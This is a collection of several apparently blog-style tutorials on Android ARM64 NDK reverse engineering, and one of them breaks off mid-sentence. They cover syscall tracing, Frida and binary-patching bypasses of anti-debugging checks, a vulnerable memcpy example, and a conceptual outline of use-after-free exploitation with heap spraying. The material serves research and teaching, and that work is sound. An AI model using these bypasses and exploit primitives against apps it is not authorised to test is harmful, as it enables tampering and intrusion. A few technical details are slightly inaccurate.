Introduction to Android NDK and ARM64 System Calls

The Android Native Development Kit (NDK) allows developers to implement parts of their applications using native code languages like C and C++. While this offers performance benefits and code reuse across platforms, it also introduces a deeper layer of complexity for reverse engineers. Modern Android devices predominantly utilize the ARM64 architecture, which means NDK binaries are compiled for ARM64. Understanding how these native binaries interact with the Linux kernel via system calls is paramount for security researchers, exploit developers, and anyone seeking to comprehend the true low-level behavior of an Android application.

System calls are the fundamental interface between user-space applications and the kernel. They provide a controlled mechanism for applications to request privileged operations, such as file I/O, network communication, process management, and memory allocation. Reverse engineering these calls in ARM64 NDK binaries unveils critical insights into an application’s permissions, potential vulnerabilities, and obfuscation techniques.

The Anatomy of an ARM64 System Call

Identifying System Call Instructions

On ARM64, the primary instruction for initiating a system call is svc #0 (Supervisor Call). When the processor encounters this instruction, it switches from user mode to a privileged mode (usually EL1 for the kernel) and transfers control to a predefined system call handler. While svc #0 is the standard, in some debugging or specific scenarios, you might encounter hlt #0xf000, which is a breakpoint instruction but not a system call itself.
```
// Example ARM64 assembly snippet showing a syscall
mov x8, #63     // System call number for 'read'
mov x0, #0      // Arg 1: file descriptor (stdin)
adrp x1, #0x12000 // Arg 2: buffer address (example)
add x1, x1, #0x1200 // Arg 2: buffer address offset
mov x2, #0x100  // Arg 3: count (100 bytes)
svc #0          // Execute the system call
```
ARM64 Calling Conventions for System Calls

The ARM64 Application Binary Interface (ABI) defines how arguments are passed to functions and how return values are handled. For system calls, a specific convention is followed:
- Arguments: The first eight arguments are passed in registers x0 through x7.
- System Call Number: The system call number itself is placed in register x8.
- Return Value: The return value from the kernel (e.g., bytes read, error code) is placed in register x0.
- Error Handling: If an error occurs, the kernel typically sets x0 to a negative value representing the errno, and in some contexts, sets the carry flag (C) in the PSTATE register.
Understanding this convention is crucial for both static and dynamic analysis, as it allows us to identify the system call being made and its parameters.

Tools and Setup for ARM64 Analysis

To effectively reverse engineer ARM64 NDK system calls, a set of specialized tools is required:
- ADB (Android Debug Bridge): For interacting with Android devices, pushing/pulling files, and shell access.
- IDA Pro or Ghidra: Powerful disassemblers and decompilers. Ghidra is free and open-source, making it an excellent choice.
- objdump (GNU Binutils): Useful for quick static disassembly on your host machine.
- gdbserver and aarch64-linux-android-gdb: For dynamic analysis and debugging native processes on Android. These are typically part of the Android NDK toolchain.
- A rooted Android device or emulator: Essential for accessing system files and running gdbserver.
Static Analysis: Dissecting NDK Binaries

Locating Target Binaries

NDK libraries (.so files) can reside in various locations on an Android device:
- /data/app/<package_name>/lib/arm64: Application-specific native libraries.
- /data/data/<package_name>/lib: Older NDK app libraries or libraries extracted at runtime.
- /system/lib64: System-level libraries.
You can use `adb` to find them:
```
adb shell find / -name "*.so" 2>/dev/null
```
Once located, pull the relevant .so file to your host machine for analysis:
```
adb pull /data/app/com.example.app/lib/arm64/libnative-lib.so .
```
Decompilation and Symbol Identification

Load the .so file into Ghidra or IDA Pro. After analysis, search for the svc #0 instruction. In Ghidra, you can navigate to the disassembly view and search for the instruction’s opcode. For svc #0, the instruction is typically 0x010000D4. Cross-referencing these instructions will lead you to functions that directly make system calls.

Consider a simple C NDK function:
```
#include <unistd.h>
#include <fcntl.h>

int native_read_file(const char* path, char* buffer, size_t size) {
    int fd = open(path, O_RDONLY);
    if (fd == -1) {
        return -1;
    }
    ssize_t bytes_read = read(fd, buffer, size);
    close(fd);
    return bytes_read;
}
```
When compiled for ARM64, the read and open calls will be translated into sequences involving mov x8, #<syscall_num> followed by svc #0. In Ghidra’s decompiler, a system call might appear as an unresolved function call, or if Ghidra has syscall definitions, it might recognize it (e.g., syscall(SYS_READ, fd, buffer, size)).

Manually, you would look for the instruction immediately preceding svc #0 that sets x8. For instance, if you see mov x8, #63 before an svc #0, you know the syscall number is 63.

Mapping Syscall Numbers to Functions

To understand what a specific system call number represents, you need to consult the Linux kernel source for ARM64. Specifically, the file arch/arm64/include/uapi/asm/unistd.h (or similar within AOSP’s bionic library, e.g., bionic/libc/include/sys/syscall.h for user-space numbers) lists the system call numbers.

Common ARM64 Linux syscall numbers include:
- 57: sys_fork
- 63: sys_read
- 64: sys_write
- 93: sys_exit
- 222: sys_mmap
By cross-referencing the value in x8 with these definitions, you can pinpoint the exact kernel function being invoked and then analyze the arguments in x0-x7 to understand its purpose.

Dynamic Analysis: Observing System Calls in Action

Static analysis tells us what *could* happen; dynamic analysis shows us what *is* happening. Using gdbserver allows you to attach a debugger to a running native process and observe system calls as they execute.

Setting up gdbserver
1. Push gdbserver to device: Ensure you have the correct aarch64-linux-android-gdbserver from your NDK toolchain.
```
adb push <NDK_ROOT>/toolchains/llvm/prebuilt/linux-x86_64/lib64/clang/<version>/lib/scudo/aarch64-linux-android/gdbserver /data/local/tmp/
adb shell chmod +x /data/local/tmp/gdbserver
```
2. Forward a port:
```
adb forward tcp:1234 tcp:1234
```
3. Start gdbserver on device: Find the PID of your target application (e.g., adb shell pidof com.example.app).
```
adb shell /data/local/tmp/gdbserver :1234 --attach <PID>
```
Attaching gdb and Tracing

On your host machine, start the ARM64 GDB client:
```
<NDK_ROOT>/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-gdb
```
Then, attach to the remote gdbserver:
```
(gdb) target remote :1234
```
Now you can set breakpoints at the svc #0 instructions identified during static analysis. For example, if your libnative-lib.so is loaded at base address 0x7000000000 and an svc #0 is at offset 0x1234:
```
(gdb) b *0x7000000000+0x1234
(gdb) c
```
When the breakpoint hits, you can examine the registers to see the syscall number and its arguments:
```
(gdb) info registers x0 x1 x2 x3 x8
```
This allows you to observe the exact arguments passed to the kernel and the return value received, providing a high-fidelity view of the application’s interaction with the operating system.

Implications for Exploit Development

Bypassing Sandboxes and Restrictions

Android’s security model heavily relies on a fine-grained permission system and various sandboxing mechanisms. However, applications written in native code can sometimes bypass certain higher-level API restrictions by directly invoking system calls. For example, a vulnerable NDK component might be exploited to call `mmap` or `mprotect` with flags that are typically disallowed for standard Java APIs, leading to memory corruption or executable code injection.

Privilege Escalation and ROP Chains

In memory corruption exploits (e.g., buffer overflows), an attacker might gain control over the program counter. To achieve meaningful actions like privilege escalation, attackers often construct Return-Oriented Programming (ROP) chains. An svc #0 instruction can serve as a potent ROP gadget. By carefully populating x8 with a desired syscall number and x0-x7 with controlled arguments, an attacker can execute arbitrary system calls (e.g., execve to launch a shell with elevated privileges) even without injecting new code.

Anti-Analysis Techniques

Malware often employs techniques to obfuscate its use of system calls. This might involve:
- Indirect syscalls: Using system call wrappers or dynamically resolving syscall numbers.
- Direct syscalls via memory: Writing the svc #0 instruction directly into executable memory at runtime.
- Syscall argument obfuscation: Encrypting or calculating arguments on the fly.
Reverse engineering these techniques requires combining static and dynamic analysis, often involving tracing memory writes to discover dynamically generated instructions or decrypted arguments.

Conclusion

Reverse engineering ARM64 system calls in Android NDK binaries is a critical skill for understanding the low-level behavior, security posture, and potential vulnerabilities of native Android applications. By leveraging static analysis tools like Ghidra/IDA Pro to identify svc #0 instructions and their arguments, and dynamic analysis with gdbserver to observe real-time execution, security researchers can gain unparalleled insight. This knowledge is not only vital for defensive security but also forms the bedrock for advanced exploit development, enabling the creation of robust ROP chains and sophisticated sandbox bypasses. The journey into ARM64 syscalls is a deep dive into the heart of Android’s native execution environment, revealing the true interactions between user-space code and the powerful Linux kernel.
May 29, 2026
Bypassing Android Native Protections: ARM64 Anti-Debugging & Obfuscation Strategies
Introduction to Android Native Protections

Android applications increasingly leverage the Native Development Kit (NDK) to compile performance-critical or security-sensitive components into native shared libraries, primarily targeting the ARM64 architecture. While offering significant advantages in speed and direct hardware access, native code also introduces new challenges for reverse engineers. To protect intellectual property, prevent tampering, and hinder exploit development, developers often implement sophisticated anti-debugging and code obfuscation techniques within these ARM64 NDK binaries. Understanding and bypassing these native protections is crucial for security researchers, penetration testers, and malware analysts.

This article delves into common ARM64 anti-debugging mechanisms and obfuscation strategies found in Android native libraries. We will explore how these techniques function at the assembly level and discuss practical methods for detecting and neutralizing them using static and dynamic analysis tools.

Common ARM64 Anti-Debugging Techniques

ptrace Detection

One of the most common anti-debugging techniques involves checking the ptrace status. A process being debugged will typically have its TracerPid field set in /proc/self/status or will fail a ptrace(PTRACE_ATTACH, ...) call if it’s already being traced. An application might periodically read this file to detect a debugger.
```
// C-style pseudo-code for ptrace detection check
FILE *status_file = fopen("/proc/self/status", "r");
char line[256];
while (fgets(line, sizeof(line), status_file)) {
    if (strstr(line, "TracerPid:") != NULL) {
        int tracer_pid = atoi(line + 10); // Skip "TracerPid:"
        if (tracer_pid != 0) {
            // Debugger detected!
            exit(1);
        }
    }
}
fclose(status_file);

// Or, directly attempt ptrace self-attachment
if (ptrace(PTRACE_ATTACH, 0, 0, 0) == -1 && errno == EPERM) {
    // Debugger detected, already being traced
    exit(1);
}
ptrace(PTRACE_DETACH, 0, 0, 0); // Detach if attached successfully
```
Bypass Strategy: Static analysis can reveal the file I/O operations (fopen, fgets, strstr) or `ptrace` calls. For `TracerPid` checks, one can use Frida to hook `fopen` or `strstr` and modify the return value or the buffer content. For `ptrace` checks, NOPing out the conditional jump after the `ptrace` call effectively disables the check.

Timing-Based Checks

Debuggers often introduce slight delays in execution due to context switching, breakpoint handling, and instruction stepping. Applications can exploit this by measuring the execution time of a specific code block and comparing it against a threshold. If the time taken exceeds the expected value, a debugger is likely present.
```
// C-style pseudo-code for timing check
struct timespec start, end;
clock_gettime(CLOCK_MONOTONIC, &start);

// Execute sensitive code block

clock_gettime(CLOCK_MONOTONIC, &end);
long elapsed_ns = (end.tv_sec - start.tv_sec) * 1000000000L + (end.tv_nsec - start.tv_nsec);

if (elapsed_ns > EXPECTED_THRESHOLD_NS) {
    // Debugger detected!
    exit(1);
}
```
Bypass Strategy: These checks are harder to bypass purely dynamically without modifying the debugger’s behavior. The most effective approach is to identify the `clock_gettime` calls and the subsequent comparison in assembly, then NOP out the conditional jump or modify the comparison constant.

Breakpoint Detection

Software breakpoints, commonly used by debuggers, work by replacing an instruction with a special breakpoint instruction (e.g., `BKPT` on ARM64). A program can detect the presence of these instructions by checksumming or scanning its own code segments. If a `BKPT` instruction (`0xD4200000` to `0xD4200020` for ARM64) is found where it shouldn’t be, a debugger is detected.

Bypass Strategy: This requires careful static analysis to locate the self-scanning routines. Once identified, NOPing out the scanning logic or patching the comparison result is necessary. Hardware breakpoints are generally undetectable by software checks but are limited in number.

Advanced ARM64 Obfuscation Strategies

Control Flow Flattening

Control flow flattening transforms a program’s linear control flow into a state machine structure. Instead of direct jumps or calls, a dispatcher routine, driven by a state variable, determines the next basic block to execute. This makes it significantly harder to understand the program’s logic and reconstruct its original control flow graph.
- Components: A dispatcher loop, a state variable, and basic blocks (handlers) for each original code segment.
- Challenge: Disassemblers struggle to identify function boundaries and call targets, resulting in a ‘spaghetti code’ appearance.
Instruction Substitution and Junk Code

This technique replaces simple, direct instructions with sequences of equivalent, but more complex or indirect, instructions. Additionally, irrelevant or ‘junk’ instructions may be inserted between meaningful operations, increasing code size and confusing static analysis tools.
```
// Original: ADD X0, X0, #1
// Obfuscated example:
MOV X2, #1
ADD X0, X0, X2
EOR X3, X3, X3  // Junk code
SUB X2, X2, #1 // More junk
```
Bypass Strategy: Manual analysis is often required to identify and simplify substituted instructions. Decompilers like Ghidra and IDA Pro have some capabilities to recognize common patterns, but complex substitutions require careful human intervention.

String Obfuscation

Critical strings (e.g., API keys, URLs, error messages) are encrypted within the binary and decrypted only at runtime when needed. This prevents straightforward string searches from revealing sensitive information.

Bypass Strategy: Dynamic analysis (e.g., using Frida) to hook string functions like `strlen`, `strcpy`, `strcmp`, or even `puts`/`printf` can reveal decrypted strings in memory. Alternatively, identifying the decryption routine statically and reversing its algorithm allows for programmatic decryption.

Anti-Disassembly Tricks

Obfuscators employ various tricks to mislead disassemblers and decompilers:
- Interleaving Code and Data: Placing data bytes within code sections, causing the disassembler to misinterpret data as instructions and vice-versa.
- Opaque Predicates: Conditional branches where the condition is always true or always false, but statically appears ambiguous, forcing the disassembler down incorrect paths.
- Indirect Jumps/Calls: Using register values for jump targets, which are only resolvable at runtime, hindering static control flow analysis.
Bypass Strategy: Requires a combination of static and dynamic analysis. For interleaved code/data, manual analysis and re-typing of bytes/instructions in IDA/Ghidra are essential. Dynamic execution and tracing can help resolve indirect jump targets.

Bypassing Native Protections: Practical Approaches

Static Analysis and Patching (IDA Pro/Ghidra)

The foundation of bypassing native protections lies in meticulous static analysis. Tools like IDA Pro and Ghidra are indispensable for disassembling ARM64 binaries and identifying protection routines.
1. Identify Protection Routines: Look for calls to `ptrace`, `fopen`, `clock_gettime`, or loops that scan memory.
2. Locate Conditional Jumps: Anti-debugging logic typically culminates in a conditional jump (`B.EQ`, `B.NE`, `CBZ`, `CBNZ`) that either exits the application or branches to benign code.
3. Patching: Change the conditional jump to an unconditional jump (`B`) or NOP out the protection logic. A common ARM64 NOP instruction is `0xD503201F` (`NOP`). For example, to NOP out a `B.EQ` instruction, replace its opcode with `NOP`. Many disassemblers have built-in patchers.
```
// Example ARM64 instruction (conditional branch)
0x12345678:  B.EQ  #0x100  ; Jump if Equal (Debugger detected, exit path)

// Patching in IDA Pro/Ghidra (change to NOP, then save binary)
// Original hex: 50 00 00 54
// NOP hex:      1F 20 03 D5

// Effectively bypassing the check, letting execution continue.
```
Dynamic Analysis with Frida

Frida is a powerful dynamic instrumentation toolkit that allows injecting JavaScript or Python code into running processes. This is ideal for runtime manipulation and bypassing protections without modifying the binary on disk.
```
// Frida script to bypass TracerPid check
Java.perform(function() {
  var fopenPtr = Module.findExportByName(null, "fopen");
  if (fopenPtr) {
    Interceptor.attach(fopenPtr, {
      onEnter: function(args) {
        this.filepath = args[0].readCString();
        if (this.filepath.includes("/proc/self/status")) {
          console.log("Detected access to: " + this.filepath);
          // Optionally, redirect to a dummy file or modify content later
        }
      },
      onLeave: function(retval) {
        if (this.filepath && this.filepath.includes("/proc/self/status")) {
          // In a real scenario, you'd modify the file content
          // or hook fread/fgets to return a modified buffer.
          // For demonstration, simply acknowledging access.
        }
      }
    });
  }

  // Example: Hooking ptrace to always return 0 (success) or -1 (error, but without EPERM)
  var ptracePtr = Module.findExportByName(null, "ptrace");
  if (ptracePtr) {
    Interceptor.replace(ptracePtr, new NativeCallback(function(request, pid, addr, data) {
      console.log("ptrace called: request=" + request + ", pid=" + pid);
      // Bypass by always returning success for attach attempts or redirecting calls.
      // A common strategy is to simply return 0 or a safe error code.
      return 0; // Pretend it succeeded or was not an attach request
    }, 'long', ['int', 'int', 'pointer', 'pointer']));
  }
});
```
Bypass Strategy: Frida can hook any exported or internal function, enabling modification of arguments, return values, or even complete replacement of function logic. This allows for bypassing `ptrace`, `fopen`, and other syscalls without touching the binary.

Memory Manipulation

In cases where anti-debugging flags are stored in global variables or on the stack, direct memory manipulation can be effective. Tools like `GDB` or `Frida` (using `Memory.write*` functions) can alter these values at runtime.

Bypass Strategy: Identify the memory address of the flag (e.g., using a debugger to observe variable changes) and then programmatically change its value. This is particularly useful for simple boolean checks or counter variables.

Conclusion

Bypassing Android native protections, particularly on ARM64, requires a deep understanding of assembly language, operating system internals, and the tools of the trade. While anti-debugging and obfuscation techniques aim to deter analysis, a combination of static analysis with tools like IDA Pro or Ghidra and dynamic instrumentation with Frida provides a powerful arsenal for reverse engineers. By systematically identifying protection mechanisms and applying appropriate bypass strategies—whether through binary patching, API hooking, or memory manipulation—it is possible to unravel even complex native code protections.
May 29, 2026
Android Native RE Lab: Dissecting Stripped ARM64 Binaries with Frida & GDB
Introduction: Navigating the Labyrinth of Android Native Binaries

Reverse engineering Android native binaries, especially those compiled for ARM64 and stripped of symbols, presents a formidable challenge. Developers often strip these binaries to reduce size and obscure internal logic, making traditional debugging difficult. However, by combining the dynamic instrumentation capabilities of Frida with the powerful debugging features of GDB, we can peer into the darkest corners of these executables. This guide will walk you through setting up a comprehensive Android reverse engineering lab and demonstrate advanced techniques for analyzing stripped ARM64 binaries, laying the groundwork for exploit development.

Understanding ARM64 assembly and its calling conventions is paramount. Unlike higher-level languages, assembly directly manipulates registers and memory, revealing the true execution flow. Our focus will be on leveraging dynamic analysis to compensate for the lack of static information, enabling us to reconstruct function logic and identify potential vulnerabilities.

Setting Up Your Android RE Lab

Before diving into analysis, ensure you have the following prerequisites:
- Rooted Android Device or Emulator: Necessary for installing Frida-server and `gdbserver` and for elevated permissions.
- ADB (Android Debug Bridge): For interacting with the device.
- Frida-server: The on-device component of Frida. Download the `frida-server-*-android-arm64` binary.
- Frida-tools: The host-side Python tools (e.g., `frida-ps`, `frida`). Install via `pip install frida-tools`.
- GDB Multiarch: A cross-architecture GDB capable of debugging ARM64 binaries (e.g., `aarch64-linux-android-gdb` from Android NDK toolchains).
- `gdbserver`: The on-device GDB server. Often found in the Android NDK toolchain (`prebuilt/android-arm64/bin/gdbserver`).
- Obfuscated ARM64 Native Binary: A target `.so` library or executable from an Android app for practice.
Basic Setup Steps:
1. Push Frida-server and GDBserver:
```
adb push frida-server /data/local/tmp/frida-server
adb push gdbserver /data/local/tmp/gdbserver
```
2. Make Executable and Run:
```
adb shell
cd /data/local/tmp
chmod +x frida-server gdbserver
./frida-server &
```
  For `gdbserver`, you’ll typically run it attached to a process or listen for connections, which we’ll cover later.
3. Port Forwarding (for GDB):
```
adb forward tcp:1234 tcp:1234
```
The Challenge: Stripped ARM64 Binaries

Stripped binaries lack symbol tables, debug information, and sometimes even relocation tables. This means function names (like `main`, `do_calculation`) are replaced with raw memory addresses, making it difficult to understand code flow statically. When debugging, you can’t simply `b main`; you must set breakpoints at specific memory offsets.

ARM64 Calling Conventions (AArch64):
- Arguments: Passed in registers `x0` through `x7`. Additional arguments are pushed onto the stack.
- Return Value: Stored in `x0`.
- Link Register (`lr` / `x30`): Holds the return address for function calls.
- Stack Pointer (`sp`): Points to the top of the stack.
- Frame Pointer (`fp` / `x29`): Often used to manage stack frames, especially for local variables.
Recognizing these conventions is crucial for understanding function calls, parameters, and return values even without symbols.

Initial Reconnaissance with `file` and `readelf`

Before dynamic analysis, get basic information about your target binary.
```
file /path/to/your/binary.so
```
Output might look like:
```
/path/to/your/binary.so: ELF 64-bit LSB shared object, ARM aarch64, version 1 (SYSV), dynamically linked, stripped
```
The
May 29, 2026
Hunting for Vulnerabilities: Static & Dynamic ARM64 NDK Code Analysis Techniques
Introduction

Android applications often leverage the Native Development Kit (NDK) to execute performance-critical code or integrate existing C/C++ libraries directly. These native binaries, typically shared object files (.so), are compiled for the device’s architecture, with ARM64 (AArch64) being prevalent in modern Android devices. While Java/Kotlin code benefits from robust security features, NDK code operates closer to the hardware, making it a prime target for attackers seeking memory corruption vulnerabilities, privilege escalation, or data exfiltration. Mastering the art of static and dynamic ARM64 NDK code analysis is crucial for security researchers and exploit developers.

This article dives deep into practical techniques for analyzing ARM64 NDK binaries, combining powerful static analysis tools like Ghidra with dynamic runtime analysis frameworks like Frida and GDB. We will explore how to identify potential weaknesses, understand ARM64 assembly, and lay the groundwork for effective exploit development.

Setting Up Your Analysis Environment

Essential Tools and Prerequisites
- Rooted Android Device or Emulator: Necessary for dynamic analysis with Frida and GDB.
- ADB (Android Debug Bridge): For interacting with the device, pushing files, and forwarding ports.
- Ghidra: A powerful open-source reverse engineering framework for static analysis.
- Android SDK & NDK: For ADB, relevant platform tools, and potentially compiling small test binaries.
- Frida: A dynamic instrumentation toolkit for hooking functions, injecting code, and observing runtime behavior.
- GDB Multiarch: A version of GDB capable of debugging ARM64 binaries on a host machine.
- GDB Server: The GDB debugger agent running on the Android device.
Device Preparation

Ensure your rooted device has adb root access. For Frida, install the Frida server on the device:
```
adb push frida-server-*-android-arm64 /data/local/tmp/frida-server
adb shell "chmod 755 /data/local/tmp/frida-server"
adb shell "/data/local/tmp/frida-server &"
```
For GDB, you’ll need the gdbserver binary from the Android NDK (e.g., <NDK_HOME>/prebuilt/android-arm64/gdbserver/gdbserver). Push it to your device:
```
adb push <NDK_HOME>/prebuilt/android-arm64/gdbserver/gdbserver /data/local/tmp/gdbserver
adb shell "chmod 755 /data/local/tmp/gdbserver"
```
Static Analysis with Ghidra

Loading and Initial Exploration

Begin by extracting the target NDK binary (e.g., libnative-lib.so) from an APK. APKs are essentially ZIP files; you can rename them to .zip and extract. The .so files are usually found in lib/arm64-v8a/.

Open Ghidra, create a new project, and import the .so file. Ghidra will prompt you to analyze it; accept the default options, ensuring ARM64 is selected.

Identifying Key Functions and Structures

Once analyzed, Ghidra’s symbol tree will list exported functions. Android NDK binaries often export functions using the JNI (Java Native Interface) naming convention, such as Java_com_example_app_MainActivity_nativeFunction. These are excellent starting points.

Navigate to the decompiled view of an interesting function. Ghidra’s decompiler is remarkably effective for ARM64, often providing C-like pseudo-code. Pay close attention to:
- Function arguments: In ARM64, the first eight integer arguments are passed in registers X0 through X7. Additional arguments are passed on the stack.
- Return values: Typically returned in X0.
- Memory operations: Look for calls to memcpy, strcpy, snprintf, read, etc., and analyze their parameters. Incorrect size calculations or unchecked input can lead to buffer overflows.
- Loop constructs and comparisons: Identify potential off-by-one errors or integer overflows in loop bounds.
- String operations: Functions like strlen or strcat, especially when combined with fixed-size buffers, are common sources of vulnerabilities.
Example Static Analysis: Buffer Overflow Hunt

Consider a hypothetical native function:
```
// In Ghidra's Decompiler view, you might see something like:
void Java_com_example_app_MainActivity_processData(JNIEnv *env, jobject thiz, jbyteArray data) {
  jbyte *buffer = (*env)->GetByteArrayElements(env, data, NULL);
  jsize data_len = (*env)->GetArrayLength(env, data);
  char local_buffer[256];

  if (data_len > 256) {
    // This check is good, but what if it's flawed or missing in other places?
    // Or what if it's 256 and memcpy tries to write 257?
    // For this example, let's assume a slightly different bug in the actual memcpy call
    // where data_len is used directly without proper bounds check for the destination.
  }
  memcpy(local_buffer, buffer, data_len); // POTENTIAL VULNERABILITY: data_len could exceed 256
  // ... further processing ...
  (*env)->ReleaseByteArrayElements(env, data, buffer, JNI_ABORT);
}
```
In the ARM64 assembly, the memcpy call would look like:
```
00101234  mov  x2, x19            // x19 holds data_len
00101238  add  x1, sp, #0x100     // x1 points to local_buffer (stack allocated)
0010123c  bl   memcpy             // Call memcpy(local_buffer, buffer, data_len)
```
Here, x2 (third argument) receives data_len, x1 (second argument) receives the source buffer (buffer), and the destination buffer local_buffer (first argument) is passed implicitly before the bl instruction. If data_len exceeds 256 bytes, a stack-based buffer overflow occurs.

Dynamic Analysis with Frida and GDB

Runtime Inspection with Frida

Frida allows you to hook into running processes and instrument native functions. This is invaluable for understanding how functions behave with live data and for confirming static analysis findings.

First, get the package name of the target application (e.g., com.example.app). You can find this in the APK’s AndroidManifest.xml or using adb shell pm list packages.

Here’s a basic Frida script to hook memcpy and observe its arguments:
```
// hook_memcpy.js
Java.perform(function() {
  var baseAddr = Module.findBaseAddress('libnative-lib.so');
  if (baseAddr) {
    console.log('libnative-lib.so base address: ' + baseAddr);
    // Find memcpy. If it's imported, you can use Module.findExportByName. Else, resolve address.
    // For demonstration, let's assume we know the offset from static analysis (e.g., 0x123c from base)
    var memcpyPtr = baseAddr.add(0x123c); // Replace with actual memcpy address if not exported

    Interceptor.attach(memcpyPtr, {
      onEnter: function(args) {
        console.log("[*] memcpy called!");
        console.log("  Destination: " + args[0]);
        console.log("  Source:      " + args[1]);
        console.log("  Size:        " + args[2].toInt32());
        // You can read memory here to inspect content
        // console.log("  Source data: " + Memory.readByteArray(args[1], args[2].toInt32()));
      },
      onLeave: function(retval) {
        console.log("[*] memcpy returned.");
      }
    });
    console.log("[*] Hooked memcpy in libnative-lib.so!");
  } else {
    console.log('libnative-lib.so not found or not loaded.');
  }
});
```
Run this script using:
```
frida -U -l hook_memcpy.js -f com.example.app --no-pause
```
Now, interact with your application. When memcpy is called, Frida will print the arguments, allowing you to confirm if a large data_len is indeed being passed.

Deep Debugging with GDB

For more granular control, including setting breakpoints, stepping through assembly, and modifying registers, GDB is indispensable. You’ll typically use gdbserver on the Android device and gdb-multiarch on your host machine.

1. Start the application on your device.

2. Attach gdbserver to the running process:
```
adb shell "/data/local/tmp/gdbserver --attach <PID> --remote-debug :1234"
```
Replace <PID> with the process ID of your app (e.g., adb shell pidof com.example.app).

3. Forward the GDB port from your device to your host:
```
adb forward tcp:1234 tcp:1234
```
4. Connect with gdb-multiarch on your host:
```
gdb-multiarch
(gdb) set architecture aarch64
(gdb) target remote :1234
```
Once connected, you can set breakpoints, inspect memory, and step through code:
- b *0xADDR: Set a breakpoint at a specific address (e.g., the memcpy call). Remember to add the base address of libnative-lib.so to the Ghidra offset.
- c: Continue execution.
- s: Step instruction.
- n: Step over instruction.
- info registers: Display current register values.
- x/16xg $sp: Examine 16 8-byte (quad-word) values from the stack pointer.
- x/s $x1: Examine string at register x1.
GDB allows you to confirm register values (X0-X7 for arguments) at the exact point of a function call, verifying the inputs that lead to a vulnerability.

Bridging Static and Dynamic Analysis for Exploitation

The true power lies in combining these techniques. Static analysis identifies potential vulnerabilities and gives you addresses. Dynamic analysis confirms these vulnerabilities with live data, helps you understand the execution flow, and allows you to test different inputs.
- Identify a primitive: Use static analysis to find functions like memcpy, read, sprintf, or custom functions that might handle user input without proper bounds checks.
- Determine input vector: How does the vulnerable function receive attacker-controlled data? Is it through JNI arguments (jbyteArray, jstring), IPC, or file I/O?
- Craft PoC input: Use dynamic analysis (Frida, GDB) to confirm that crafted input can trigger the vulnerability (e.g., cause a crash, overwrite specific memory regions). For a buffer overflow, this might involve sending an overly long byte array.
- Exploit development: Once confirmed, you can use the detailed understanding of the stack layout, register usage, and memory addresses (obtained from static analysis and refined by dynamic debugging) to develop an exploit payload (e.g., ROP chain for arbitrary code execution or shellcode injection).
Conclusion

Hunting for vulnerabilities in ARM64 NDK code is a challenging but rewarding endeavor. By meticulously combining static analysis with Ghidra to map out the binary’s structure and identify suspicious patterns, and dynamic analysis with Frida and GDB to observe runtime behavior and confirm hypotheses, security researchers can effectively uncover critical flaws. This comprehensive approach empowers you to move beyond superficial analysis and understand the intricate details required for robust vulnerability research and exploit development in the Android ecosystem.
May 29, 2026
Advanced ARM64 NDK Exploit Primitives: Heap Spraying & UAF on Android
Introduction to Advanced ARM64 NDK Exploitation

Exploiting native code on Android, particularly NDK binaries compiled for ARM64 architecture, presents a unique set of challenges and opportunities. While modern Android versions incorporate robust security mitigations, understanding core exploit primitives like User-After-Free (UAF) vulnerabilities and heap spraying remains critical for advanced research and ethical hacking. This article delves into these two powerful techniques, demonstrating how they can be combined to achieve arbitrary read/write or even code execution on ARM64 Android devices.

We will explore the underlying concepts, provide conceptual code examples relevant to NDK development, and discuss practical considerations for developing exploits in this complex environment. A solid grasp of ARM64 assembly, C/C++ memory management, and Android’s native runtime is assumed.

Understanding User-After-Free (UAF) Vulnerabilities

A User-After-Free (UAF) vulnerability occurs when a program continues to use a pointer to memory that has already been freed. This can lead to a variety of issues, from crashes to information disclosure, and critically, arbitrary code execution. On modern systems, especially with heap allocators like jemalloc (commonly used on Android), a freed memory chunk can be reallocated to a different object, allowing an attacker to control the data at a previously used address.

Anatomy of a UAF

Consider the following simplified C++ NDK code snippet:
```
class MaliciousObject {public:    void (*callback_func)();    char buffer[256];    MaliciousObject() {        callback_func = nullptr;        memset(buffer, 0, sizeof(buffer));    }    void execute() {        if (callback_func) {            callback_func();        }    }};void vulnerable_function() {    MaliciousObject* obj = new MaliciousObject();    // ... some operations ...    delete obj; // obj is freed, but pointer 'obj' still holds the address    // ... some unrelated code ...    // Later, potentially attacker-controlled code uses 'obj' pointer again    obj->execute(); // UAF! The memory 'obj' points to might have been reallocated}
```
In this example, after obj is deleted, the memory it occupied is returned to the heap. If obj->execute() is called afterward, the program attempts to dereference a stale pointer. If another object is allocated into that same memory slot before the `execute` call, an attacker might control the content of that memory, including the `callback_func` pointer, leading to arbitrary code execution.

Heap Spraying: Controlling the Heap Layout

Heap spraying is a technique used to fill specific regions of the heap with attacker-controlled data. Its primary goal in exploitation is to reliably place a desired payload (e.g., shellcode, fake object structures, or controlled pointers) at a predictable memory location or to increase the probability that a subsequent allocation will land in an attacker-controlled chunk. This becomes particularly powerful when combined with UAFs, as it allows an attacker to dictate what data occupies the freed UAF chunk.

Why Heap Spraying?

Heap allocators are complex and non-deterministic to some extent. Factors like allocation size, allocation patterns, and multithreading can influence where memory chunks are placed. Heap spraying aims to mitigate this unpredictability by flooding the heap with many identical or similar-sized objects. When a UAF occurs and the freed chunk is available, a carefully sized and timed heap spray can ensure that an attacker-controlled object occupies that specific freed slot.

On ARM64, pointer sizes are 8 bytes. This means that if we are trying to overwrite a vtable pointer or a function pointer, we need to ensure our sprayed objects are the correct size to fill the target UAF chunk and contain our 64-bit address.

Basic Heap Spraying Concept

A typical heap spray involves allocating numerous objects of a specific size:
```
// Example of a conceptual heap spray loopvoid perform_heap_spray(size_t chunk_size, int num_chunks, void* data_to_spray) {    for (int i = 0; i < num_chunks; ++i) {        char* spray_chunk = new char[chunk_size];        if (spray_chunk) {            // Fill the chunk with attacker-controlled data            memcpy(spray_chunk, data_to_spray, chunk_size);            // Store pointers to prevent them from being immediately freed            // In a real exploit, these might be stored in a global vector            // or kept alive by other means.            // e.g., g_spray_objects.push_back(spray_chunk);        }    }}
```
The `data_to_spray` would contain the attacker’s payload, such as a pointer to shellcode or a controlled vtable structure.

Combining UAF and Heap Spraying on ARM64 Android

The true power emerges when UAF and heap spraying are combined. The general exploit flow on ARM64 Android would be:
1. Identify and trigger a UAF vulnerability in an NDK binary.
2. Immediately after the vulnerable object is freed, perform a heap spray. The goal is to allocate new objects that are precisely the same size as the freed UAF object.
3. Through careful timing and sizing, one of the sprayed objects will likely occupy the memory location previously held by the UAF object.
4. When the stale pointer of the UAF object is subsequently dereferenced (e.g., calling a method on a C++ object, or accessing data members), it will now operate on the attacker-controlled sprayed data.
